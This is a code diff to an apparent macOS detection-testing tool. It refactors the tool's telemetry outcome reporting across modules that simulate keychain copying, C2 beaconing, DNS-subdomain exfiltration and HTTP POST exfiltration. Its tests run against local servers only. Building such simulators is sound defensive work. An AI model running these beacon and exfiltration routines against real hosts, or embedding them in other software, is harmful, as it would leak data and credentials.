 	mod := &fileKeychainCopy{}
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 	if err := mod.Generate(context.Background(), module.Params{"stage_dir": stageDir}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -131,7 +131,7 @@ func TestKeychainCopy_CleanupRemovesStagedCopies(t *testing.T) {
 
 	stageDir := filepath.Join(t.TempDir(), "stage")
 	mod := &fileKeychainCopy{}
-	if err := mod.Generate(context.Background(), module.Params{"stage_dir": stageDir}, func(module.TelemetryEvent) {}); err != nil {
+	if err := mod.Generate(context.Background(), module.Params{"stage_dir": stageDir}, noopEmit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
 

--- a/modules/file/keychain_copy_test.go
+++ b/modules/file/keychain_copy_test.go
@@ -156,7 +156,7 @@ func TestKeychainEventsEmitsReadAndCopy(t *testing.T) {
 		t.Errorf("second event = %q, want keychain_copy", evs[1].EventType)
 	}
 	for _, ev := range evs {
-		if got := ev.ResolvedOutcome(); got != module.OutcomeExecuted {
+		if got := ev.Outcome; got != module.OutcomeExecuted {
 			t.Errorf("%s resolved outcome = %q, want executed", ev.EventType, got)
 		}
 	}
@@ -182,8 +182,8 @@ func TestKeychainEventsAbsentStoreIsIndeterminate(t *testing.T) {
 	if evs[0].Outcome != module.OutcomeIndeterminate {
 		t.Errorf("outcome = %q, want indeterminate", evs[0].Outcome)
 	}
-	if !evs[0].Success {
-		t.Error("Success = false; an absent store is a valid observation, not a fault")
+	if evs[0].Outcome != module.OutcomeIndeterminate {
+		t.Errorf("Outcome = %q, want indeterminate", evs[0].Outcome)
 	}
 	if evs[0].Details["exists"] != false {
 		t.Errorf("exists = %v, want false", evs[0].Details["exists"])
@@ -217,7 +217,7 @@ func TestKeychainEventsStageWriteFailureIsError(t *testing.T) {
 	if evs[0].EventType != "keychain_copy" {
 		t.Errorf("event type = %q, want keychain_copy", evs[0].EventType)
 	}
-	if got := evs[0].ResolvedOutcome(); got != module.OutcomeError {
+	if got := evs[0].Outcome; got != module.OutcomeError {
 		t.Errorf("resolved outcome = %q, want error", got)
 	}
 }

--- a/modules/file/modify.go
+++ b/modules/file/modify.go
@@ -2,6 +2,7 @@ package file
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -57,39 +58,35 @@ func (f *fileModify) Generate(ctx context.Context, params module.Params, emit mo
 	switch {
 	case os.IsNotExist(err):
 		if err2 := os.MkdirAll(filepath.Dir(targetPath), 0o755); err2 != nil {
-			ev := output.NewEvent(info, "file_modify", false, "failed to create parent directory")
+			ev := output.NewEvent(info, "file_modify", module.OutcomeError, module.File(targetPath), "failed to create parent directory")
 			ev = output.WithError(ev, err2)
-			emit(ev)
-			return err2
+			return errors.Join(err2, emit(ev))
 		}
 		orig = []byte{}
 		f.existed = false
 	case err != nil:
-		ev := output.NewEvent(info, "file_modify", false, fmt.Sprintf("failed to read %s", targetPath))
+		ev := output.NewEvent(info, "file_modify", module.OutcomeError, module.File(targetPath), fmt.Sprintf("failed to read %s", targetPath))
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	default:
 		f.existed = true
 	}
 	f.origContent = orig
 
 	newContent := append(orig, []byte(fmt.Sprintf("\n%s [%s]", content, time.Now().UTC()))...)
-	ev := output.NewEvent(info, "file_modify", false, fmt.Sprintf("modifying %s", targetPath))
+	ev := output.NewEvent(info, "file_modify", module.OutcomeError, module.File(targetPath), fmt.Sprintf("modifying %s", targetPath))
 	if err := os.WriteFile(targetPath, newContent, 0o644); err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("modified %s (+%d bytes)", targetPath, len(newContent)-len(orig))
 	ev = output.WithDetails(ev, map[string]any{
 		"path":      targetPath,
 		"orig_size": len(orig),
 		"new_size":  len(newContent),
 	})
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (f *fileModify) DryRun(params module.Params) []string {

--- a/modules/file/modify_test.go
+++ b/modules/file/modify_test.go
@@ -9,7 +9,7 @@ import (
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
-func noopEmit(module.TelemetryEvent) {}
+func noopEmit(module.TelemetryEvent) error { return nil }
 
 // Cleanup must delete a file that fileModify itself created, not leave an
 // empty file behind. The bug: origContent was set to a non-nil empty slice

--- a/modules/network/beacon.go
+++ b/modules/network/beacon.go
@@ -80,7 +80,7 @@ func (c *c2Beacon) Generate(ctx context.Context, params module.Params, emit modu
 		default:
 		}
 
-		ev := output.NewEvent(info, "http_beacon", false, fmt.Sprintf("beacon %d/%d to %s", i, count, target))
+		ev := output.NewEvent(info, "http_beacon", module.OutcomeError, module.Network("", target, ""), fmt.Sprintf("beacon %d/%d to %s", i, count, target))
 		req, err := http.NewRequestWithContext(ctx, http.MethodGet, target, nil)
 		var resp *http.Response
 		if err == nil {
@@ -94,11 +94,13 @@ func (c *c2Beacon) Generate(ctx context.Context, params module.Params, emit modu
 			ev.Message = fmt.Sprintf("beacon %d/%d to %s (no response — telemetry generated)", i, count, target)
 		} else {
 			_ = resp.Body.Close()
-			ev.Success = true
+			ev.Outcome = module.OutcomeExecuted
 			ev.Message = fmt.Sprintf("beacon %d/%d to %s returned %d", i, count, target, resp.StatusCode)
 			ev = output.WithDetails(ev, map[string]any{"attempt": i, "total": count, "url": target, "status": resp.StatusCode})
 		}
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 
 		if i < count {
 			select {

--- a/modules/network/beacon_exec_test.go
+++ b/modules/network/beacon_exec_test.go
@@ -30,7 +30,7 @@ func TestBeaconGenerate_RequestsAndEvents(t *testing.T) {
 	ctx = module.ContextWithRunID(ctx, "beaconrun42")
 	var events []module.TelemetryEvent
 	params := module.Params{"target": ts.URL + "/beacon?existing=keep", "count": "3", "interval": "0"}
-	if err := (&c2Beacon{}).Generate(ctx, params, func(ev module.TelemetryEvent) { events = append(events, ev) }); err != nil {
+	if err := (&c2Beacon{}).Generate(ctx, params, captureNetworkEvents(&events)); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
 	mu.Lock()
@@ -43,7 +43,7 @@ func TestBeaconGenerate_RequestsAndEvents(t *testing.T) {
 			t.Errorf("request %d = %+v", i, req)
 		}
 		ev := events[i]
-		if ev.Module != "net_beacon" || ev.EventType != "http_beacon" || !ev.Success || ev.ResolvedOutcome() != module.OutcomeExecuted {
+		if ev.Module != "net_beacon" || ev.EventType != "http_beacon" || ev.Outcome != module.OutcomeExecuted {
 			t.Errorf("event %d = %+v", i, ev)
 		}
 		// An HTTP error response still proves that the request executed.
@@ -66,14 +66,14 @@ func TestBeaconGenerate_RefusedIsDenied(t *testing.T) {
 		t.Fatal(err)
 	}
 	var events []module.TelemetryEvent
-	if err := (&c2Beacon{}).Generate(context.Background(), module.Params{"target": target, "count": "2", "interval": "0"}, func(ev module.TelemetryEvent) { events = append(events, ev) }); err != nil {
+	if err := (&c2Beacon{}).Generate(context.Background(), module.Params{"target": target, "count": "2", "interval": "0"}, captureNetworkEvents(&events)); err != nil {
 		t.Fatal(err)
 	}
 	if len(events) != 2 {
 		t.Fatalf("got %d events, want 2", len(events))
 	}
 	for _, ev := range events {
-		if ev.EventType != "http_beacon" || !ev.Success || ev.ResolvedOutcome() != module.OutcomeDenied || ev.Error == "" {
+		if ev.EventType != "http_beacon" || ev.Outcome != module.OutcomeDenied || ev.Error == "" {
 			t.Errorf("refused beacon = %+v", ev)
 		}
 	}
@@ -90,7 +90,7 @@ func TestBeaconGenerate_WaitsBetweenRequests(t *testing.T) {
 	defer ts.Close()
 	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
 	defer cancel()
-	if err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "2", "interval": "1", "jitter": "0"}, func(module.TelemetryEvent) {}); err != nil {
+	if err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "2", "interval": "1", "jitter": "0"}, discardNetworkEvent); err != nil {
 		t.Fatal(err)
 	}
 	mu.Lock()
@@ -111,9 +111,10 @@ func TestBeaconGenerate_CancelBetweenRequests(t *testing.T) {
 	defer cancel()
 	var events []module.TelemetryEvent
 	start := time.Now()
-	err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "3", "interval": "3"}, func(ev module.TelemetryEvent) {
+	err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "3", "interval": "3"}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		cancel()
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) || len(events) != 1 {
 		t.Fatalf("err = %v, events = %d; want canceled after one event", err, len(events))
@@ -140,7 +141,7 @@ func TestBeaconGenerate_CancelInFlight(t *testing.T) {
 	defer close(release)
 	var events []module.TelemetryEvent
 	start := time.Now()
-	err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "1"}, func(ev module.TelemetryEvent) { events = append(events, ev) })
+	err := (&c2Beacon{}).Generate(ctx, module.Params{"target": ts.URL, "count": "1"}, captureNetworkEvents(&events))
 	select {
 	case <-started:
 	default:

--- a/modules/network/connect.go
+++ b/modules/network/connect.go
@@ -49,24 +49,25 @@ func (n *netConnect) Generate(ctx context.Context, params module.Params, emit mo
 
 	info := n.Info()
 
-	ev := output.NewEvent(info, "tcp_connect", false, fmt.Sprintf("dialing TCP %s", address))
+	ev := output.NewEvent(info, "tcp_connect", module.OutcomeError, module.Network(address, "", ""), fmt.Sprintf("dialing TCP %s", address))
 	conn, err := net.DialTimeout("tcp", address, 3*time.Second)
 	if err != nil {
 		// A refused dial is the environment declining, not macnoise breaking,
 		// and the SYN that went out is the telemetry this module exists for.
 		// net_revshell already treats the identical case this way.
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
-		emit(ev)
 	} else {
 		_ = conn.Close()
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("TCP connection established to %s", address)
 		ev = output.WithDetails(ev, map[string]any{"address": address, "protocol": "tcp"})
-		emit(ev)
+	}
+	if err := emit(ev); err != nil {
+		return err
 	}
 
 	url := tagURL(fmt.Sprintf("http://%s", address), module.RunIDFromContext(ctx))
-	httpEv := output.NewEvent(info, "http_get", false, fmt.Sprintf("HTTP GET %s", url))
+	httpEv := output.NewEvent(info, "http_get", module.OutcomeError, module.Network("", url, ""), fmt.Sprintf("HTTP GET %s", url))
 	client := http.Client{Timeout: 3 * time.Second}
 	resp, err := client.Get(url)
 	if err != nil {
@@ -74,13 +75,11 @@ func (n *netConnect) Generate(ctx context.Context, params module.Params, emit mo
 		httpEv.Message = fmt.Sprintf("HTTP GET %s generated telemetry (connection refused expected)", url)
 	} else {
 		_ = resp.Body.Close()
-		httpEv.Success = true
+		httpEv.Outcome = module.OutcomeExecuted
 		httpEv.Message = fmt.Sprintf("HTTP GET %s returned %d", url, resp.StatusCode)
 		httpEv = output.WithDetails(httpEv, map[string]any{"url": url, "status_code": resp.StatusCode})
 	}
-	emit(httpEv)
-
-	return nil
+	return emit(httpEv)
 }
 
 func (n *netConnect) DryRun(params module.Params) []string {

--- a/modules/network/connect_test.go
+++ b/modules/network/connect_test.go
@@ -28,7 +28,7 @@ func TestConnectGenerate_EmitsConnectThenGet(t *testing.T) {
 	host, port := hostPort(t, ts.URL)
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 	if err := (&netConnect{}).Generate(context.Background(), module.Params{"target": host, "port": port}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -39,7 +39,7 @@ func TestConnectGenerate_EmitsConnectThenGet(t *testing.T) {
 	if events[0].EventType != "tcp_connect" || events[1].EventType != "http_get" {
 		t.Errorf("event types = %q,%q; want tcp_connect,http_get", events[0].EventType, events[1].EventType)
 	}
-	if !events[0].Success || !events[1].Success {
+	if events[0].Outcome != module.OutcomeExecuted || events[1].Outcome != module.OutcomeExecuted {
 		t.Errorf("both events should succeed against a live server: %+v", events)
 	}
 }
@@ -54,15 +54,15 @@ func TestConnectGenerate_RefusedIsDenied(t *testing.T) {
 	_ = ln.Close()
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 	if err := (&netConnect{}).Generate(context.Background(), module.Params{"target": host, "port": port}, emit); err != nil {
 		t.Fatalf("Generate should not error on a refused connection: %v", err)
 	}
 	if len(events) != 2 {
 		t.Fatalf("emitted %d events, want 2 even when refused", len(events))
 	}
-	if events[0].ResolvedOutcome() != module.OutcomeDenied {
-		t.Errorf("refused tcp_connect outcome = %q, want denied", events[0].ResolvedOutcome())
+	if events[0].Outcome != module.OutcomeDenied {
+		t.Errorf("refused tcp_connect outcome = %q, want denied", events[0].Outcome)
 	}
 }
 
@@ -72,7 +72,7 @@ func TestConnectGenerate_RunIDInHTTPURL(t *testing.T) {
 	host, port := hostPort(t, ts.URL)
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 	ctx := module.ContextWithRunID(context.Background(), "runid1234")
 	if err := (&netConnect{}).Generate(ctx, module.Params{"target": host, "port": port}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)

--- a/modules/network/dns.go
+++ b/modules/network/dns.go
@@ -52,17 +52,19 @@ func (n *netDNS) Generate(ctx context.Context, params module.Params, emit module
 		if domain == "" {
 			continue
 		}
-		ev := output.NewEvent(info, "dns_lookup", false, fmt.Sprintf("resolving %s", domain))
+		ev := output.NewEvent(info, "dns_lookup", module.OutcomeError, module.Network("", "", domain), fmt.Sprintf("resolving %s", domain))
 		addrs, err := resolver.LookupHost(ctx, domain)
 		if err != nil {
 			ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 			ev.Message = fmt.Sprintf("DNS lookup %s failed (telemetry generated)", domain)
 		} else {
-			ev.Success = true
+			ev.Outcome = module.OutcomeExecuted
 			ev.Message = fmt.Sprintf("DNS lookup %s resolved to %s", domain, strings.Join(addrs, ", "))
 			ev = output.WithDetails(ev, map[string]any{"domain": domain, "addresses": addrs})
 		}
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/network/dns_exfil.go
+++ b/modules/network/dns_exfil.go
@@ -41,6 +41,7 @@ func (n *netDNSExfil) ParamSpecs() []module.ParamSpec {
 			Name:        "payload",
 			Description: "String to exfiltrate via DNS subdomain encoding",
 			Type:        module.ParamString,
+			Sensitive:   true,
 			Default:     "macnoise-exfil-test",
 			Example:     "stolen-secret-data",
 		},
@@ -113,14 +114,13 @@ func (n *netDNSExfil) Generate(ctx context.Context, params module.Params, emit m
 		default:
 		}
 
-		ev := output.NewEvent(info, "dns_exfil_query", false,
+		ev := output.NewEvent(info, "dns_exfil_query", module.OutcomeError, module.Network("", "", qname),
 			fmt.Sprintf("exfil query %d/%d: %s", i+1, len(queries), qname))
 		_, err := resolver.LookupHost(ctx, qname)
 		if ctx.Err() != nil {
 			return ctx.Err()
 		}
 		if err != nil {
-			ev.Success = true
 			ev.Message = fmt.Sprintf("exfil query %d/%d failed (telemetry generated): %s", i+1, len(queries), qname)
 			ev = output.WithDetails(ev, map[string]any{
 				"query":       qname,
@@ -130,7 +130,7 @@ func (n *netDNSExfil) Generate(ctx context.Context, params module.Params, emit m
 			})
 			ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		} else {
-			ev.Success = true
+			ev.Outcome = module.OutcomeExecuted
 			ev.Message = fmt.Sprintf("exfil query %d/%d resolved: %s", i+1, len(queries), qname)
 			ev = output.WithDetails(ev, map[string]any{
 				"query":       qname,
@@ -139,7 +139,9 @@ func (n *netDNSExfil) Generate(ctx context.Context, params module.Params, emit m
 				"base_domain": baseDomain,
 			})
 		}
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/network/dns_exfil_exec_test.go
+++ b/modules/network/dns_exfil_exec_test.go
@@ -113,8 +113,9 @@ func TestDNSExfilGenerate_QueriesAndOutcomes(t *testing.T) {
 			ctx = module.ContextWithRunID(ctx, runID)
 			var events []module.TelemetryEvent
 			mod := &netDNSExfil{}
-			err := mod.Generate(ctx, module.Params{"payload": payload, "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) {
+			err := mod.Generate(ctx, module.Params{"payload": payload, "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) error {
 				events = append(events, ev)
+				return nil
 			})
 			if err != nil {
 				t.Fatal(err)
@@ -141,7 +142,7 @@ func TestDNSExfilGenerate_QueriesAndOutcomes(t *testing.T) {
 				if i == 1 {
 					outcome = module.OutcomeDenied
 				}
-				if ev.Module != "net_dns_exfil" || ev.EventType != "dns_exfil_query" || !ev.Success || ev.ResolvedOutcome() != outcome || (ev.Error != "") != (i == 1) {
+				if ev.Module != "net_dns_exfil" || ev.EventType != "dns_exfil_query" || ev.Outcome != outcome || (ev.Error != "") != (i == 1) {
 					t.Errorf("event %d = %+v", i, ev)
 				}
 				if ev.Details["query"] != want[i]+"." || ev.Details["chunk_index"] != i || ev.Details["total"] != len(want) || ev.Details["base_domain"] != "exfil.test." {
@@ -168,8 +169,9 @@ func TestDNSExfilGenerate_CancelInFlight(t *testing.T) {
 		return -1
 	})
 	var events []module.TelemetryEvent
-	err := (&netDNSExfil{}).Generate(ctx, module.Params{"payload": "test", "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) {
+	err := (&netDNSExfil{}).Generate(ctx, module.Params{"payload": "test", "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
+		return nil
 	})
 	select {
 	case <-started:
@@ -194,9 +196,10 @@ func TestDNSExfilGenerate_CancelBetweenChunks(t *testing.T) {
 		return 0
 	})
 	var events []module.TelemetryEvent
-	err := (&netDNSExfil{}).Generate(ctx, module.Params{"payload": strings.Repeat("test", 40), "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) {
+	err := (&netDNSExfil{}).Generate(ctx, module.Params{"payload": strings.Repeat("test", 40), "base_domain": "exfil.test."}, func(ev module.TelemetryEvent) error {
 		events = append(events, ev)
 		cancel()
+		return nil
 	})
 	if !errors.Is(err, context.Canceled) || len(events) != 1 {
 		t.Fatalf("err = %v, events = %d; want canceled after one event", err, len(events))

--- a/modules/network/dns_exfil_test.go
+++ b/modules/network/dns_exfil_test.go
@@ -17,6 +17,18 @@ func TestEncodeExfilPayload_DNSSafe(t *testing.T) {
 	}
 }
 
+func TestDNSExfilPayloadIsSensitive(t *testing.T) {
+	for _, spec := range (&netDNSExfil{}).ParamSpecs() {
+		if spec.Name == "payload" {
+			if !spec.Sensitive {
+				t.Fatal("payload parameter is not marked sensitive")
+			}
+			return
+		}
+	}
+	t.Fatal("payload parameter spec not found")
+}
+
 func TestEncodeExfilPayload_NoPadding(t *testing.T) {
 	encoded := encodeExfilPayload("test")
 	if strings.Contains(encoded, "=") {

--- a/modules/network/dns_test.go
+++ b/modules/network/dns_test.go
@@ -8,9 +8,18 @@ import (
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
+func captureNetworkEvents(events *[]module.TelemetryEvent) module.EventEmitter {
+	return func(ev module.TelemetryEvent) error {
+		*events = append(*events, ev)
+		return nil
+	}
+}
+
+func discardNetworkEvent(module.TelemetryEvent) error { return nil }
+
 func TestDNSGenerate_EmitsOnePerDomain(t *testing.T) {
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	err := (&netDNS{}).Generate(context.Background(), module.Params{"domains": "localhost,macnoise.invalid"}, emit)
 	if err != nil {
@@ -28,7 +37,7 @@ func TestDNSGenerate_EmitsOnePerDomain(t *testing.T) {
 
 func TestDNSGenerate_SkipsEmptyDomains(t *testing.T) {
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	// Leading/trailing commas and whitespace-only entries must not produce a lookup.
 	err := (&netDNS{}).Generate(context.Background(), module.Params{"domains": "localhost, ,,macnoise.invalid,"}, emit)
@@ -42,7 +51,7 @@ func TestDNSGenerate_SkipsEmptyDomains(t *testing.T) {
 
 func TestDNSGenerate_FailedLookupIsDeniedNotError(t *testing.T) {
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	// A .invalid name (RFC 6761) never resolves, but a failed resolution is
 	// valid telemetry — the query still went out — not a macnoise error.
@@ -53,20 +62,20 @@ func TestDNSGenerate_FailedLookupIsDeniedNotError(t *testing.T) {
 	if len(events) != 1 {
 		t.Fatalf("emitted %d events, want 1", len(events))
 	}
-	if events[0].ResolvedOutcome() != module.OutcomeDenied {
-		t.Errorf("outcome = %q, want denied", events[0].ResolvedOutcome())
+	if events[0].Outcome != module.OutcomeDenied {
+		t.Errorf("outcome = %q, want denied", events[0].Outcome)
 	}
 }
 
 func TestDNSGenerate_SuccessCarriesAddresses(t *testing.T) {
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	// localhost resolves on every platform without a network round-trip.
 	if err := (&netDNS{}).Generate(context.Background(), module.Params{"domains": "localhost"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
-	if len(events) != 1 || !events[0].Success {
+	if len(events) != 1 || events[0].Outcome != module.OutcomeExecuted {
 		t.Fatalf("expected 1 successful event, got %+v", events)
 	}
 	addrs, ok := events[0].Details["addresses"].([]string)

--- a/modules/network/exfil.go
+++ b/modules/network/exfil.go
@@ -4,6 +4,7 @@ import (
 	"bytes"
 	"context"
 	"crypto/rand"
+	"errors"
 	"fmt"
 	"net/http"
 	"time"
@@ -49,13 +50,12 @@ func (n *netExfil) Generate(ctx context.Context, params module.Params, emit modu
 	payload := make([]byte, payloadSize)
 	rand.Read(payload) //nolint:errcheck
 
-	ev := output.NewEvent(info, "http_post_exfil", false, fmt.Sprintf("POST %d bytes to %s", payloadSize, target))
+	ev := output.NewEvent(info, "http_post_exfil", module.OutcomeError, module.Network("", target, ""), fmt.Sprintf("POST %d bytes to %s", payloadSize, target))
 	client := &http.Client{Timeout: 10 * time.Second}
 	req, err := http.NewRequestWithContext(ctx, http.MethodPost, target, bytes.NewReader(payload))
 	if err != nil {
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 	req.Header.Set("Content-Type", contentType)
 
@@ -63,7 +63,7 @@ func (n *netExfil) Generate(ctx context.Context, params module.Params, emit modu
 	resp, err := client.Do(req)
 	elapsed := time.Since(start)
 	if err != nil {
-		ev.Success = true
+		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		ev.Message = fmt.Sprintf("POST to %s failed (no listener — telemetry generated)", target)
 		ev = output.WithDetails(ev, map[string]any{
 			"target":       target,
@@ -74,7 +74,7 @@ func (n *netExfil) Generate(ctx context.Context, params module.Params, emit modu
 		})
 	} else {
 		_ = resp.Body.Close()
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("POST %d bytes to %s returned %d", payloadSize, target, resp.StatusCode)
 		ev = output.WithDetails(ev, map[string]any{
 			"target":       target,
@@ -84,8 +84,7 @@ func (n *netExfil) Generate(ctx context.Context, params module.Params, emit modu
 			"elapsed_ms":   elapsed.Milliseconds(),
 		})
 	}
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (n *netExfil) DryRun(params module.Params) []string {

--- a/modules/network/exfil_test.go
+++ b/modules/network/exfil_test.go
@@ -19,7 +19,7 @@ func TestExfilGenerate_PostsToLiveServer(t *testing.T) {
 	defer ts.Close()
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 	if err := (&netExfil{}).Generate(context.Background(), module.Params{"target": ts.URL, "payload_size": "2048"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -27,7 +27,7 @@ func TestExfilGenerate_PostsToLiveServer(t *testing.T) {
 	if len(events) != 1 || events[0].EventType != "http_post_exfil" {
 		t.Fatalf("expected 1 http_post_exfil event, got %+v", events)
 	}
-	if !events[0].Success {
+	if events[0].Outcome != module.OutcomeExecuted {
 		t.Errorf("POST to a live server should succeed: %s", events[0].Message)
 	}
 	if events[0].Details["status"] != http.StatusOK {
@@ -38,7 +38,7 @@ func TestExfilGenerate_PostsToLiveServer(t *testing.T) {
 	}
 }
 
-func TestExfilGenerate_NoListenerStillSucceeds(t *testing.T) {
+func TestExfilGenerate_NoListenerIsDenied(t *testing.T) {
 	ln, err := net.Listen("tcp", "127.0.0.1:0")
 	if err != nil {
 		t.Fatal(err)
@@ -47,13 +47,13 @@ func TestExfilGenerate_NoListenerStillSucceeds(t *testing.T) {
 	_ = ln.Close()
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 	if err := (&netExfil{}).Generate(context.Background(), module.Params{"target": target}, emit); err != nil {
 		t.Fatalf("Generate should not error with no listener: %v", err)
 	}
-	// The outbound POST is the telemetry; a refused connection does not make it a failure.
-	if len(events) != 1 || !events[0].Success {
-		t.Fatalf("expected 1 successful event even with no listener, got %+v", events)
+	// The outbound POST is the telemetry, while the refusal describes its outcome.
+	if len(events) != 1 || events[0].Outcome != module.OutcomeDenied {
+		t.Fatalf("expected 1 denied event with no listener, got %+v", events)
 	}
 	if events[0].Details["error"] == nil {
 		t.Error("expected the connection error to be recorded in details")
@@ -67,7 +67,7 @@ func TestExfilGenerate_RunIDInRequestURL(t *testing.T) {
 	}))
 	defer ts.Close()
 
-	emit := func(module.TelemetryEvent) {}
+	emit := discardNetworkEvent
 	ctx := module.ContextWithRunID(context.Background(), "exfilrun99")
 	if err := (&netExfil{}).Generate(ctx, module.Params{"target": ts.URL}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)

--- a/modules/network/listen.go
+++ b/modules/network/listen.go
@@ -2,6 +2,7 @@ package network
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"net"
 	"strconv"
@@ -48,16 +49,17 @@ func (n *netListen) Generate(ctx context.Context, params module.Params, emit mod
 
 	l, err := net.Listen("tcp", address)
 	if err != nil {
-		ev := output.NewEvent(info, "tcp_listen", false, fmt.Sprintf("failed to bind %s", address))
+		ev := output.NewEvent(info, "tcp_listen", module.OutcomeError, module.Network(address, "", ""), fmt.Sprintf("failed to bind %s", address))
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 	n.listener = l
 
-	ev := output.NewEvent(info, "tcp_listen", true, fmt.Sprintf("listening on %s", address))
+	ev := output.NewEvent(info, "tcp_listen", module.OutcomeExecuted, module.Network(address, "", ""), fmt.Sprintf("listening on %s", address))
 	ev = output.WithDetails(ev, map[string]any{"address": address})
-	emit(ev)
+	if err := emit(ev); err != nil {
+		return err
+	}
 
 	payload := "TELEMETRY_PING"
 	if runID := module.RunIDFromContext(ctx); runID != "" {
@@ -95,10 +97,9 @@ func (n *netListen) Generate(ctx context.Context, params module.Params, emit mod
 		}
 		defer func() { _ = res.conn.Close() }()
 
-		accepted := output.NewEvent(info, "tcp_accept", true, fmt.Sprintf("accepted connection from %s", res.conn.RemoteAddr()))
+		accepted := output.NewEvent(info, "tcp_accept", module.OutcomeExecuted, module.Network(res.conn.RemoteAddr().String(), "", ""), fmt.Sprintf("accepted connection from %s", res.conn.RemoteAddr()))
 		accepted = output.WithDetails(accepted, map[string]any{"remote_addr": res.conn.RemoteAddr().String()})
-		emit(accepted)
-		return nil
+		return emit(accepted)
 	}
 }
 

--- a/modules/network/listen_test.go
+++ b/modules/network/listen_test.go
@@ -13,7 +13,7 @@ import (
 func TestNetListen_AcceptsSelfConnection(t *testing.T) {
 	n := &netListen{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureNetworkEvents(&events)
 
 	ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
 	defer cancel()
@@ -26,10 +26,10 @@ func TestNetListen_AcceptsSelfConnection(t *testing.T) {
 	if len(events) != 2 {
 		t.Fatalf("expected 2 events (tcp_listen, tcp_accept), got %d", len(events))
 	}
-	if events[0].EventType != "tcp_listen" || !events[0].Success {
+	if events[0].EventType != "tcp_listen" || events[0].Outcome != module.OutcomeExecuted {
 		t.Errorf("event[0] = %+v, want successful tcp_listen", events[0])
 	}
-	if events[1].EventType != "tcp_accept" || !events[1].Success {
+	if events[1].EventType != "tcp_accept" || events[1].Outcome != module.OutcomeExecuted {
 		t.Errorf("event[1] = %+v, want successful tcp_accept", events[1])
 	}
 }
@@ -40,7 +40,7 @@ func TestNetListen_AcceptsSelfConnection(t *testing.T) {
 // context must now short-circuit Accept() immediately.
 func TestNetListen_RespectsContextCancellation(t *testing.T) {
 	n := &netListen{}
-	emit := func(module.TelemetryEvent) {}
+	emit := discardNetworkEvent
 
 	ctx, cancel := context.WithCancel(context.Background())
 	cancel()
@@ -60,7 +60,7 @@ func TestNetListen_RespectsContextCancellation(t *testing.T) {
 
 func TestNetListen_DefaultBindsLoopback(t *testing.T) {
 	n := &netListen{}
